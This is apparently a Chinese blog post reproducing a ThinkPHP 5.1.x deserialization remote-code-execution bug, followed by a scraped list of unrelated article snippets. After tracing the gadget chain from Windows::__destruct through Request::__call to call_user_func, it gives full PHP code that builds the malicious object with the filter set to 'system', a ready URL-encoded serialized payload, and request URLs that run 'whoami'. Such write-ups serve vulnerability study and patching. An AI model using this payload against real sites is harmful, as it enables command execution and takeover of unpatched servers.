succ3

Thinkphp5.1.x反序列化漏洞复现

漏洞分析

漏洞的起点为/thinkphp/library/think/process/pipes/Windows.php的__destruct()。

public function __destruct()
    {
        $this->close();
        $this->removeFiles();
    }

__destruct 调用了两个函数，close() 函数没有可利用的，跟进 removeFiles()，里面有一个任意文件删除unlink，当然对rce没啥帮助。

private function removeFiles()
    {
        foreach ($this->files as $filename) {
            if (file_exists($filename)) {
                @unlink($filename);
            }
        }
        $this->files = [];
    }

file_exists会将$filename当作字符串处理。

而__toString 当一个对象被当做字符串处理时会被触发，我们通过传入一个对象来触发__toString 方法。所以全局搜索可以利用的__toString方法。

全局搜索下，选择了 Conversion.php 中的 __toString 魔术方法。

public function __toString() //trait Conversion类
    {
        return $this->toJson();
    }

跟进 toJson 函数。

public function toJson($options = JSON_UNESCAPED_UNICODE)
    {
        return json_encode($this->toArray(), $options);
    }

继续跟进 toArray 函数。

public function toArray()
    {
        $item       = [];
        $hasVisible = false;
        ......
        // 追加属性（必须定义获取器）
        if (!empty($this->append)) {
            foreach ($this->append as $key => $name) {
                if (is_array($name)) {
                    // 追加关联对象属性
                    $relation = $this->getRelation($key);

                    if (!$relation) {
                        $relation = $this->getAttr($key);
                        if ($relation) {
                        //$relation可控，$name通过this->append也可控，
                        //visible方法名无所谓，不存在的话，可以触发__call
                            $relation->visible($name);
                        }
                    } 
         .......
    }

在 toArray 函数里找到一个满足$可控变量->方法(可控参数)的点，其中 $relation 通过 getRelation 和 getAttr 是可控的。

接下来跟进 getRelation 函数。

public function getRelation($name = null)
    {
        if (is_null($name)) {
            return $this->relation;
        } elseif (array_key_exists($name, $this->relation)) {
            return $this->relation[$name];
        }
        return;
    }

要返回空才能使得在 toArray 中往下执行 $relation = $this->getAttr($key);，所以这边可以不用理。

继续跟进 getAttr。

public function getAttr($name, &$item = null)
    {
        try {
            $notFound = false;
            $value    = $this->getData($name); //return value给$relation
        } catch (InvalidArgumentException $e) {
            $notFound = true;
            $value    = null;
        }
        ......
   }

继续跟进 getData。

 public function getData($name = null)
    {
        if (is_null($name)) {
            return $this->data;
        } elseif (array_key_exists($name, $this->data)) {
            return $this->data[$name];	//$this->data[$name]返回给value再返回给$relation
        } elseif (array_key_exists($name, $this->relation)) {
            return $this->relation[$name];
        }
        throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);
    }

因为这边的 getData 里的 name 是 toArray 里的 $this->append 键名，而 $this->append 又不能为空，所以 getData 的第一个 if 触发不了。

阶段小结：

removeFiles  =》 file_exists
__toString =》toJson =》toArray（$relation->visible($name)）其中relation 和 name 可控

relation  =》$this->getAttr($key) =》$this->getData($name) =》$this->data[$name]
$key 为 $this->append 的键名。
$this->data 可控。

当 $relation 为对象时就可以调用方法并传参了，但是要用到不同类中的不同方法，所以这版就涉及到 php 的一个小知识点 Trait，所以我们要找一个继承了用到的所有方法的类的一个类。

自 PHP 5.4.0 起，PHP 实现了一种代码复用的方法，称为 trait。通过在类中使用use 关键字，声明要组合的Trait名称。

__toString	trait Conversion
getRelation	trait RelationShip
getAttr		trait Attribute
getData		trait Attribute

最后在 Model.php 中找到符合条件的类，不过这个类是抽象类，还要找它的子类去实现它.

abstract class Model implements \JsonSerializable, \ArrayAccess
{
    use model\concern\Attribute;
    use model\concern\RelationShip;
    use model\concern\ModelEvent;
    use model\concern\TimeStamp;
    use model\concern\Conversion;
    .......
}

在 Pivot.php 的 Pivot 类实现了 model 类

class Pivot extends Model
{
	........
}

代码执行点分析

上面说到 $relation->visible($name) 我们可以控制 relation 和 name ，所以接下来要找一个可以利用的类。

全局搜索 visible 没有可以利用的点，那么只能利用 __call 函数了。

所以我们要找一个类，这个类不能有 visiable ，但要有 __call 。

全局搜索，Request.php 中的 __call 虽然可以利用，但是无法直接利用，
hook['visiable'=>' 可利用的方法'] , arg[$this, 'toArray的name']其中 arg 因为 $this 变得不可控

public function __call($method, $args)
    {
        if (array_key_exists($method, $this->hook)) {//检查hook是否是method数组的键名
            array_unshift($args, $this);//把this插入到args数组的开头，arg=[$this,$name]    
            //这边的arg是数组,且因为array_unshift的存在导致我们无法rce
            return call_user_func_array($this->hook[$method], $args);
        }
        throw new Exception('method not exists:' . static::class . '->' . $method);
    }

在 Thinkphp 的 Request 类中还有一个功能 filter 功能，实际上 Thinkphp 的一些 rce 都与这个功能有关，可以试着覆盖 filter 的方法去 rce。

在 filterValue 函数中有 call_user_func 可 rce 的函数，但是 value 不可控。

private function filterValue(&$value, $key, $filters)
    {
        $default = array_pop($filters);

        foreach ($filters as $filter) {
            if (is_callable($filter)) {
                // 调用函数或者方法过滤
                
                //这边的value不可控，要找可以控制value的点，利用input函数
                $value = call_user_func($filter, $value);
            } elseif (is_scalar($value)) {
                if (false !== strpos($filter, '/')) {
                    // 正则过滤
                    if (!preg_match($filter, $value)) {
                        // 匹配不成功返回默认值
                        $value = $default;
                        break;
                    }
                } elseif (!empty($filter)) {
                    // filter函数不存在时, 则使用filter_var进行过滤
                    // filter为非整形值时, 调用filter_id取得过滤id
                    $value = filter_var($value, is_int($filter) ? $filter : filter_id($filter));
                    if (false === $value) {
                        $value = $default;
                        break;
                    }
                }
            }
        }

        return $value;
    }

找调用 filterValue 的函数，input函数

public function input($data = [], $name = '', $default = null, $filter = '')
    {
        //name通过isAjax控制$this->config['var_ajax'],也就是控制了param的name，也就控制了input的name
        if (false === $name) {
            // 获取原始数据
            return $data;
        }

        $name = (string) $name;
        if ('' != $name) {
            // 解析name
            if (strpos($name, '/')) {
                list($name, $type) = explode('/', $name);
            }
			//getData($data)里的data参数是param里的this->param,也就是get和post所有参数	
            $data = $this->getData($data, $name);

            if (is_null($data)) {
                return $default;
            }

            if (is_object($data)) {
                return $data;
            }
        }

        // 解析过滤器
        $filter = $this->getFilter($filter, $default);

        if (is_array($data)) {
            array_walk_recursive($data, [$this, 'filterValue'], $filter);//调用了filterValue但是参数不可控
            if (version_compare(PHP_VERSION, '7.1.0', '<')) {
                // 恢复PHP版本低于 7.1 时 array_walk_recursive 中消耗的内部指针
                $this->arrayReset($data);
            }
        } else {
            $this->filterValue($data, $name, $filter);
        }

        if (isset($type) && $data !== $default) {
            // 强制类型转换
            $this->typeCast($data, $type);
        }

        return $data;
    }

这边用了 array_walk_recursive 回调函数调用了 filterValue ，但是参数依然不可控。

array_walk_recursive解析：


$arr = array('a' => 'apple', 'b' => 'banana', 'c' => array('c1' => 'green orange', 'c2' => 'yello orange'));

function aaa($v, $k, $udata) {
    echo $udata .' '. $v .' '.$k. '
';
}
array_walk_recursive($arr, aaa, 'I like');

从输出中可以看出参数的赋值是有顺序的，键值是第一个参数，键名是第二个参数，而自己定义的则是第三个。

I like apple a<br>I like banana b<br>I like green orange c1<br>I like yello orange c2<br>

再找找什么函数调用了 input 且可控变量的，param函数。

public function param($name = '', $default = null, $filter = '')
    {
        if (!$this->mergeParam) {
            $method = $this->method(true);

            // 自动获取请求变量
            switch ($method) {
                case 'POST':
                    $vars = $this->post(false);
                    break;
                case 'PUT':
                case 'DELETE':
                case 'PATCH':
                    $vars = $this->put(false);
                    break;
                default:
                    $vars = [];
            }

            // 当前请求参数和URL地址中的参数合并
            $this->param = array_merge($this->param, $this->get(false), $vars, $this->route(false));

            $this->mergeParam = true;
        }

        if (true === $name) {
            // 获取包含文件上传信息的数组
            $file = $this->file();
      		
      		//这边的data可控，也就是this->param数组和file数组的总，但file可以为空，所以只剩this->param
            $data = is_array($file) ? array_merge($this->param, $file) : $this->param;

            return $this->input($data, '', $default, $filter);
        }

        return $this->input($this->param, $name, $default, $filter);
    }

$this->param 完全可控，接收 get 参数，也就是说 input 函数的 data 可控，也就是 call_user_func 的 value 可控。现在还有一个 name 参数不可控，继续找调用 param 的函数。

在 isAjax 函数中，$this->config['var_ajax'])是可控的，那么 param 的 name 就是可控的，也就是 input 的 name 参数可控。

public function isAjax($ajax = false)
    {
        $value  = $this->server('HTTP_X_REQUESTED_WITH');
        $result = 'xmlhttprequest' == strtolower($value) ? true : false;

        if (true === $ajax) {
            return $result;
        }

        $result           = $this->param($this->config['var_ajax']) ? true : $result;
        $this->mergeParam = false;
        return $result;
    }

那么 isAjax 也就是链的开始了，到这我们再阶段小结一下。

isAjax 的 $this->config['var_ajax'] 控制了 param函数的 name，也间接控制了 input 的 name。
param 的 $this->param可控，也就是 input 函数的 `data` 可控 ，也就是 `call_user_func` 的 `value` 可控。

接下来继续看 input 函数，因为还有个参数 $filter 也就是 call_user_func($filter, $value);的 filter 参数没控制。

跟进 getData 函数

protected function getData(array $data, $name)
    {
        foreach (explode('.', $name) as $val) {
            if (isset($data[$val])) {
                $data = $data[$val];
            } else {
                return;
            }
        }

        return $data;
    }

跟进 getFilter 函数

protected function getFilter($filter, $default)
    {
        if (is_null($filter)) {
            $filter = [];
        } else {
            $filter = $filter ?: $this->filter;
            if (is_string($filter) && false === strpos($filter, '/')) {
                $filter = explode(',', $filter);
            } else {
                $filter = (array) $filter;
            }
        }

        $filter[] = $default;

        return $filter;
    }

$filter = $this->filter，也就是 call_user_func 的 $filter，我们要定义 $filter 为可以 rce 的函数名。

到这我们就可以知道，filterValue.value 是 param 的 $this->param，也就是第一个 get 参数，而 filters.filters 就等于 input.filters 的值。

构造payload：

windows 类中的 removeFiles 里需要一个 file 数组，数组中是继承了各个类的model类的子类，又因为Pivot类和Windows类不在同一个空间里，所以要use一下。

namespace think\process\pipes;
use think\model\Pivot;
class Windows{
    private $files = [];
    public function __construct(){
        $this->files=[new Pivot()];
    }
}

接着就是 Pivot 和 Model 类

namespace think\model;
use think\Model;

class Pivot extends Model{

}

this->data 是 getData 函数的 $this->data[$name];，而 $name 是 toArray 函数里 this->append 数组的键名，所以data 数组的键名才要和 append 一样，而 append 键值要为 request 类中不存在的方法，这样才会自动调用 requests 类的 __call 函数，也就完成了 $relation->visible($name); 的利用。

namespace think;
abstract class Model{
    protected $append=[];
    private $data=[];
    public function __construct(){
        $this->append=["shell"=>['call']];
        $this->data=["shell"=>new Request()];
     }
}

最后就是 Request 类，hook 使回调函数调用 isAjax，然后往前推，推到 param 时会把 this->param（接收第一个get值）也就是 filterValue 里的 value 传给 input，到 input 时，filter 通过 getFilter 函数传给 input 函数的 filter，最后传给 filterValue 的 filter，这样最后到 filterValue 就会执行 call_user_func('system','get')

namespace think;
class Request{
    protected $hook = [];
    protected $filter;
    protected $config;
    public function __construct(){
        $this->hook['visible'] = [$this, 'isAjax'];
        $this->filter = "system";
    }
}


namespace think;
abstract class Model{
    protected $append=[];
    private $data=[];
    public function __construct(){
        $this->append=["shell"=>['call']];
        $this->data=["shell"=>new Request()];
     }
}

namespace think\model;
use think\Model;

class Pivot extends Model{

}

namespace think;
class Request{
    protected $hook = [];
    protected $filter;
    protected $config = [
    // 表单请求类型伪装变量
    'var_method'       => '_method',
    // 表单ajax伪装变量
    'var_ajax'         => '_ajax',
    // 表单pjax伪装变量
    'var_pjax'         => '_pjax',
    // PATHINFO变量名 用于兼容模式
    'var_pathinfo'     => 's',
    // 兼容PATH_INFO获取
    'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
    // 默认全局过滤方法 用逗号分隔多个
    'default_filter'   => '',
    // 域名根，如thinkphp.cn
    'url_domain_root'  => '',
    // HTTPS代理标识
    'https_agent_name' => '',
    // IP代理获取标识
    'http_agent_ip'    => 'HTTP_X_REAL_IP',
    // URL伪静态后缀
    'url_html_suffix'  => 'html',
    ];
    public function __construct(){
        $this->config = ["var_ajax"=>''];
        $this->hook['visible'] = [$this, 'isAjax'];
        $this->filter = "system";
    }
}

namespace think\process\pipes;
use think\model\Pivot;
 
class Windows{
    private $files = [];
    public function __construct(){
        $this->files=[new Pivot()];
    }
}
echo urlencode(serialize(new Windows()));

如果没有入口文件，那要先构造一个入口文件。

第一个请求路由为application\index\controller\index.php文件->Index类->hello()方法，别名pathinfo()形式路由，第二个请求利用了 thinkphp 的兼容模式url

http://ip/public/index.php/index/Index/hello?a=whoami
http://ip/public/index.php?s=index/index/hello&a=whoami

post:
str=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A5%3A%22shell%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A4%3A%22call%22%3B%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A5%3A%22shell%22%3BO%3A13%3A%22think%5CRequest%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00hook%22%3Ba%3A1%3A%7Bs%3A7%3A%22visible%22%3Ba%3A2%3A%7Bi%3A0%3Br%3A8%3Bi%3A1%3Bs%3A6%3A%22isAjax%22%3B%7D%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3Bs%3A9%3A%22%00%2A%00config%22%3BN%3B%7D%7D%7D%7D%7D

参考

https://blog.csdn.net/weixin_45794666/article/details/123222190
https://github.com/Jason1314Zhang/BUUCTF-WP/blob/main/N1BOOK/%5B%E7%AC%AC%E4%B8%89%E7%AB%A0%20web%E8%BF%9B%E9%98%B6%5Dthinkphp%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E9%93%BE.md

你可能感兴趣的:(Thinkphp漏洞复现,Thinkphp5.1.x,反序列化)

discuz discuz_admincp.php 讲解,Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729) weixin_39740419 discuz 讲解
0x00漏洞简述漏洞信息8月27号有人在GitHub上公布了有关Discuz1.5-2.5版本中后台数据库备份功能存在的命令执行漏洞的细节。漏洞影响版本Discuz!1.5-2.50x01漏洞复现官方论坛下载相应版本就好。0x02漏洞分析需要注意的是这个漏洞其实是需要登录后台的，并且能有数据库备份权限，所以比较鸡肋。我这边是用Discuz!2.5完成漏洞复现的，并用此进行漏洞分析的。漏洞点在：so
内网穿透之EW使用、判断服务器是否出网板栗妖怪学习内网渗透
环境搭建使用的是下面文章的环境记一次学习--内网穿透-CSDN博客ew代理然后同样通过thinkphp漏洞写入文件，然后通过蚁剑连接然后上传ew的Linux版本，然后加权执行一层代理正向代理设置正向代理（在ubuntu上），然后kali在proxychain配置文件中连接ubuntu的192.168.244.154的代理端口反向代理在ubuntu上设置反向代理，将连接反弹到kali上的某个端口。然
python基于django/flask的NBA球员大数据分析与可视化python+java+node.js QQ_511008285 python django flask java spring boot 数据分析
前端开发框架:vue.js数据库mysql版本不限后端语言框架支持：1java(SSM/springboot)-idea/eclipse2.Nodejs+Vue.js-vscode3.python(flask/django)--pycharm/vscode4.php(thinkphp/laravel)-hbuilderx数据库工具：Navicat/SQLyog等都可以本文针对NBA球员的大数据进行
Java基于spring boot的国产电影数据分析与可视化python+java+node.js QQ_511008285 java spring boot 数据分析 python django vue.js flask
前端开发框架:vue.js数据库mysql版本不限后端语言框架支持：1java(SSM/springboot)-idea/eclipse2.Nodejs+Vue.js-vscode3.python(flask/django)--pycharm/vscode4.php(thinkphp/laravel)-hbuilderx数据库工具：Navicat/SQLyog等都可以该系统使用进行大数据处理和
【漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE) 李火火安全阁漏洞复现应用安全 WPS Office
文章目录前言声明一、漏洞描述二、影响范围三、漏洞复现服务端的功能客户端的功能四、修复建议前言2023HVV期间曝出的WPSOffice存在RCE漏洞，攻击者可通过该漏洞执行任意命令，获取服务器控制权限。声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
使用WAF防御网络上的隐蔽威胁之反序列化攻击 baiolkdnhjaio 网络安全
什么是反序列化反序列化是将数据结构或对象状态从某种格式转换回对象的过程。这种格式通常是二进制流或者字符串（如JSON、XML），它是对象序列化（即对象转换为可存储或可传输格式）的逆过程。反序列化的安全风险反序列化的安全风险主要来自于处理不受信任的数据源时的不当反序列化。如果应用程序反序列化了恶意构造的数据，攻击者可能能够执行代码、访问敏感数据、进行拒绝服务攻击等。这是因为反序列化过程中可能会自动触
aspcms webshell漏洞复现青衫木牛马 asp aspcms getshell
1.【ip】/admin_aspcms/login.asp访问后台，admin123456登录2.点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包3.在抓取的数据包中修改slideTextStatus字段的值为以下代码并进行发包访问影响文件字段值1%25><%25密码是a影响文件/config/AspCms_Config.asp4.蚁剑连接
【保姆级】Protobuf详解及入门指南 AQin1012 Java 网络 protobuf 序列化二进制协议协议 Java
目录Protobuf概述什么是Protobuf为什么要使用ProtobufProtobuf实战环境配置创建文件解析/封装数据附录AQin.proto完整代码Protobuf概述什么是ProtobufProtobuf（ProtocolBuffers）协议Protobuf是一种由Google开发的二进制序列化格式和相关的技术，它用于高效地序列化和反序列化结构化数据，通常用于网络通信、数据存储等场景为什
第 12 章 Spring MVC 扩展和 SSM 框架整合 HUNAG-DA-PAO spring mvc java
SpringMVC框架处理JSON数据SON格式数据在现阶段的Web项目开发中扮演着非常重要的角色。在前端页面和后台交互的过程中，需要一种格式清晰、高效且两端都可以轻松使用的数据格式做交互的媒介，JSON正可以满足这一需求。JSON数据的传递处理在Java中处理JSON数据的传递通常涉及到序列化和反序列化操作。序列化是将Java对象转换为JSON格式的字符串，以便可以将其存储或通过网络传输；反序列
Nginx越界读取缓存漏洞 CVE-2017-7529 漏洞复现 ADummy_ vulhub_Writeup 网络安全渗透测试安全漏洞
Nginx越界读取缓存漏洞（CVE-2017-7529）byADummy0x00利用路线POC验证—>读取到缓存文件中位于“http返回包体”前的“文件头”、“http返回包头”等内容0x01漏洞介绍Nginx在反向代理站点的时候，通常会将一些文件进行缓存，特别是静态文件。缓存的部分存储在文件中，每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件，
flink table factory基础知识 loukey_j
一、概述在flink中很多组件都是TableFactory的子类。比如序列化，反序列化，tableSinkFactory,tableSourceFactory.TableFactory是用来创建序列化，反序列器，tableSource和tableSink的工厂。二、TableFactory源码在flink框架中，TableFactory的子类并不是程序员自己随心new出来的。flink的提供给程序
【漏洞复现】华三 H3C IMC 智能管理中心 /byod/index.xhtml RCE 凝聚力安全团队漏洞复现 xhtml 前端 html web渗透 web 网络安全渗透测试
免责声明：本文内容旨在提供有关特定漏洞或安全漏洞的信息，以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步，并非出于任何恶意目的。阅读者应该明白，在利用本文提到的漏洞信息或进行相关测试时，可能会违反某些法律法规或服务协议。同时，未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所
[Moshi]认识新一代对Kotlin友好的JSON解析框架天空光芒
为什么是Moshi切换到kotlin之后，在使用fastJSON时遇到了一些问题，经过网上的查询，要使fastJSON能够正常工作，需要额外添加kotlin-reflect依赖，感觉不是很爽。于是一通搜索之后，找到了著名的Square团队的又一个优秀的开源库——Moshi。它在允许使用传统的反射机制进行JSON序列化与反序列化的同时，也可以通过注解的方式在编译时生成解析类，不必引入2M+的refl
使用WAF防御网络上的隐蔽威胁之反序列化攻击白帽学子网络安全
什么是反序列化反序列化是将数据结构或对象状态从某种格式转换回对象的过程。这种格式通常是二进制流或者字符串（如JSON、XML），它是对象序列化（即对象转换为可存储或可传输格式）的逆过程。反序列化的安全风险反序列化的安全风险主要来自于处理不受信任的数据源时的不当反序列化。如果应用程序反序列化了恶意构造的数据，攻击者可能能够执行代码、访问敏感数据、进行拒绝服务攻击等。这是因为反序列化过程中可能会自动触
Thinkphp中where()条件的使用 2401_84875852 程序员服务器 java 网络
|notin|notin|$map[‘id’]=array(‘notin’,‘1,5,8’);|idnotin(1,5,8)||and（默认）|and|$map[‘id’]=array(array(‘gt’,1),array(‘lt’,10));|(id>1)AND(id3)OR(idwhere(User->where(User−>where(map)->select();相当于sql语句：nam
「漏洞复现」契约锁电子签章平台 add 远程命令执行漏洞鲨鱼辣椒丶D 漏洞复现 web安全
0x01免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！！！0x02产品介绍契约锁电子签章平台是上海亘岩网络科技有限公司推出的一套数字签章解决方案。契约锁为中大型组织提供“数
Hadoop Common 之序列化机制小解猫君之上 #Apache Hadoop
1.JavaSerializable序列化该序列化通过ObjectInputStream的readObject实现序列化，ObjectOutputStream的writeObject实现反序列化。这不过此种序列化虽然跨病态兼容性强，但是因为存储过多的信息，但是传输效率比较低，所以hadoop弃用它。（序列化信息包括这个对象的类，类签名，类的所有静态，费静态成员的值，以及他们父类都要被写入）publ
JsonCpp源码分析——Reader 哎呦，帅小伙哦 #jsoncpp json
1、与Writer模块功能相反，可以将Reader理解成一个反序列化的工具，Writer的作用主要是将Value对象转成string或者流式的结构，Reader的作用主要是将流式的结构转成Value类型的对象。Reader类的主要职责有3个，解析JSON字符串：将JSON格式的字符串读取并解析成相应的C++数据结构。处理不同的数据类型，支持解析JSON对象、数组、字符串、数字、布尔值和null。处
Redis的incr命令引发的反序列化异常和ERR value is not an integer or out of range异常臣妾写不来啊 Java编码技巧 redis 数据库缓存
在Java中使用inc命令的时候发现redis中的值被反序列化后居然不是数字,检查后发现可能是序列化器没对,在redis配置的地方将序列化器设置为Jackson2JsonRedisSerializer后使用整成,贴上代码@Bean(name="RedisTemplate")@SuppressWarnings("all")publicRedisTemplateredisTemplate(RedisC
反序列化漏洞 Slash_HK web安全相关 php 安全 web安全
JavaPHP反序列化总结文章目录一.PHP反序列化1.序列化serialize()2.反序列化unserialize()二.反序列化漏洞1.漏洞利用Magicfunction2.漏洞利用思路三._construct()的利用2.利用普通成员类方法四.PHP反序列化漏洞总结1.CVE-2016-7124一.PHP反序列化1.序列化serialize()首先我们创建了一个对象，通过serialize
weblogic-SSRF漏洞复现（SSRF原理、利用与防御）不想当脚本小子的脚本小子中间件漏洞复现 SSRF 安全
一、SSRF概念服务端请求伪造(Server-SideRequestForgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、文档等等。首先，我们要对目标网站的架构了解
Java高级编程—I/O流（包括字节输入流、字节输出流、字符输出流、字符输入流、缓冲流、序列化流、反序列化流等，详解附有代码＋案例）蔚一 Java知识 java 开发语言算法 intellij-idea
文章目录二十七.I/O流27.1概述27.2分类27.3字节输出流27.3.1数据写入本地文件27.3.2换行、续写27.4字节输入流27.4.1读取数据到程序27.4.2循环读取27.4.3拷贝数据27.4.4一次读取多个27.6字符输入流27.6.1FileReader的使用27.7字符输出流27.8.缓冲流27.8.1字节缓冲流27.8.1.1拷贝文件(一)27.8.1.2拷贝文件(二)27
THINKPHP like between 的array用法 kang1919 TP
if($title!=''){$_where['title']=array('LIKE','%'.$title.'%');}if(''!=$url){$_where['url']=array('LIKE','%'.$url.'%');}if(0<$start_time&&$start_time<$end_time){$_where['create_time']=array('between',ar
基于ThinkPHP5的旧衣回收小程序——二手交换废物系统的设计与实现 IT实战课堂—x小凡同学 Java毕业设计项目小程序
摘要：随着社会的快速发展和人们生活水平的提高，旧衣物数量迅速增加，传统的旧衣处理方式已难以满足现代社会的需求。为了有效减少资源浪费，提高旧衣物的利用率，本文基于ThinkPHP5框架设计并实现了一款旧衣回收小程序——二手交换废物系统。该系统通过线上平台，实现旧衣物的回收、分类、展示、交换等功能，为用户提供了一种便捷、环保的旧衣处理方式。本文将从系统需求分析、系统设计、系统实现、系统测试与评估等方面
shiro 采用redis共享session，出现反序列化错误的排查过程 nightseventhunit redis java 数据库
这是一个老系统改造的过程，该老系统采用的框架是#jfinal#shiroredis,采用outh2协议的方式，对多个子系统之间进行单点登录，以实现系统之间的session，由于速度方面的影响，现在要改造成多个系统之间共享session，并采用redis集群的方式。说明一下当前项目的整体运行环境，此项目的多个子系统都在同一个域名下，通过上下文不同来区分子系统。以下将记录整个改造过程，采用jfinal
Hive 的 SerDe 是什么？ Shockang 大数据技术体系大数据 hive
前言本文隶属于专栏《1000个问题搞定大数据技术体系》，该专栏为笔者原创，引用请注明来源，不足和错误之处请在评论区帮忙指出，谢谢！本专栏目录结构和参考文献请见1000个问题搞定大数据技术体系正文hive的SerDe是什么SerDe是Serializer/Deserializer的简写。hive使用SerDe进行行对象的序列与反序列化。最后实现把文件内容映射到hive表中的字段数据类型。为了更好的阐
【web | CTF】攻防世界 Web_php_unserialize 星盾网安 CTF -Web php 开发语言
天命：这条反序列化题目也是比较特别，里面的漏洞知识点，在现在的php都被修复了天命：而且这次反序列化的字符串数量跟其他题目不一样file=$file;}//销毁时候触发，相当于是打印flag文件出来function__destruct(){echo@highlight_file($this->file,true);}//这个方法不会触发，估计是旧版本的php，满足某些情况所以没有触发//纯碎用来吓
【攻防世界】Web_php_unserialize Miracle& web web安全网络安全
1.信息收集：从题目：知道反序列化；2.源码审计：file=$file;}function__destruct(){//析构函数在对象被销毁时自动调用，用于执行一些清理操作或释放资源。echo@highlight_file($this->file,true);}function__wakeup(){//在反序列化对象时自动调用if($this->file!='index.php'){//these
攻防世界-Web_php_unserialize roast mouse php 网络安全
攻防世界-Web_php_unserialize分析php代码file=$file;}//析构函数function__destruct(){//打开指定文件，并高亮文件中内容，第二个为return参数，为true，函数将返回高亮显示的代码字符串，而不是直接输出到浏览器。echo@highlight_file($this->file,true);}//wakeup魔法函数，在反序列化之前调用。fun
攻防世界 Web_php_unserialize Cyan1u #攻防世界 php
Web_php_unserializePHP反序列化看看代码file=$file;}function__destruct(){echo@highlight_file($this->file,true);}function__wakeup(){if($this->file!='index.php'){//thesecretisinthefl4g.php$this->file='index.php';
Enum 枚举 120153216 enum 枚举
原文地址：http://www.cnblogs.com/Kavlez/p/4268601.html Enumeration 于Java 1.5增加的enum type...enum type是由一组固定的常量组成的类型，比如四个季节、扑克花色。在出现enum type之前，通常用一组int常量表示枚举类型。比如这样： public static final int APPLE_FUJI = 0
Java8简明教程 bijian1013 java jdk1.8
Java 8已于2014年3月18日正式发布了，新版本带来了诸多改进，包括Lambda表达式、Streams、日期时间API等等。本文就带你领略Java 8的全新特性。一.允许在接口中有默认方法实现 Java 8 允许我们使用default关键字，为接口声明添
Oracle表维护快速备份删除数据 cuisuqiang oracle 索引快速备份删除
我知道oracle表分区，不过那是数据库设计阶段的事情，目前是远水解不了近渴。当前的数据库表，要求保留一个月数据，且表存在大量录入更新，不存在程序删除。为了解决频繁查询和更新的瓶颈，我在oracle内根据需要创建了索引。但是随着数据量的增加，一个半月数据就要超千万，此时就算有索引，对高并发的查询和更新来说，让然有所拖累。为了解决这个问题，我一般一个月会进行一次数据库维护，主要工作就是备
java多态内存分析麦田的设计者 java 内存分析多态原理接口和抽象类
“ 时针如果可以回头，熟悉那张脸，重温嬉戏这乐园，墙壁的松脱涂鸦已经褪色才明白存在的价值归于记忆。街角小店尚存在吗？这大时代会不会牵挂，过去现在花开怎么会等待。但有种意外不管痛不痛都有伤害，光阴远远离开，那笑声徘徊与脑海。但这一秒可笑不再可爱，当天心
Xshell实现Windows上传文件到Linux主机被触发 windows
经常有这样的需求，我们在Windows下载的软件包，如何上传到远程Linux主机上？还有如何从Linux主机下载软件包到Windows下；之前我的做法现在看来好笨好繁琐，不过也达到了目的，笨人有本方法嘛；我是怎么操作的： 1、打开一台本地Linux虚拟机，使用mount 挂载Windows的共享文件夹到Linux上，然后拷贝数据到Linux虚拟机里面；（经常第一步都不顺利，无法挂载Windo
类的加载ClassLoader 肆无忌惮_ ClassLoader
类加载器ClassLoader是用来将java的类加载到虚拟机中，类加载器负责读取class字节文件到内存中，并将它转为Class的对象（类对象），通过此实例的 newInstance()方法就可以创建出该类的一个对象。其中重要的方法为findClass(String name)。如何写一个自己的类加载器呢？首先写一个便于测试的类Student
html5写的玫瑰花知了ing html5
<html> <head> <title>I Love You!</title> <meta charset="utf-8" /> </head> <body> <canvas id="c"></canvas>
google的ConcurrentLinkedHashmap源代码解析矮蛋蛋 LRU
原文地址： http://janeky.iteye.com/blog/1534352 简述 ConcurrentLinkedHashMap 是google团队提供的一个容器。它有什么用呢？其实它本身是对 ConcurrentHashMap的封装，可以用来实现一个基于LRU策略的缓存。详细介绍可以参见 http://code.google.com/p/concurrentlinke
webservice获取访问服务的ip地址 alleni123 webservice
1. 首先注入javax.xml.ws.WebServiceContext, @Resource private WebServiceContext context; 2. 在方法中获取交换请求的对象。 javax.xml.ws.handler.MessageContext mc=context.getMessageContext(); com.sun.net.http
菜鸟的java基础提升之道——————>是否值得拥有百合不是茶
1，c++，java是面向对象编程的语言，将万事万物都看成是对象；java做一件事情关注的是人物，java是c++继承过来的，java没有直接更改地址的权限但是可以通过引用来传值操作地址，java也没有c++中繁琐的操作，java以其优越的可移植型，平台的安全型，高效性赢得了广泛的认同，全世界越来越多的人去学习java，我也是其中的一员 java组成：
通过修改Linux服务自动启动指定应用程序 bijian1013 linux
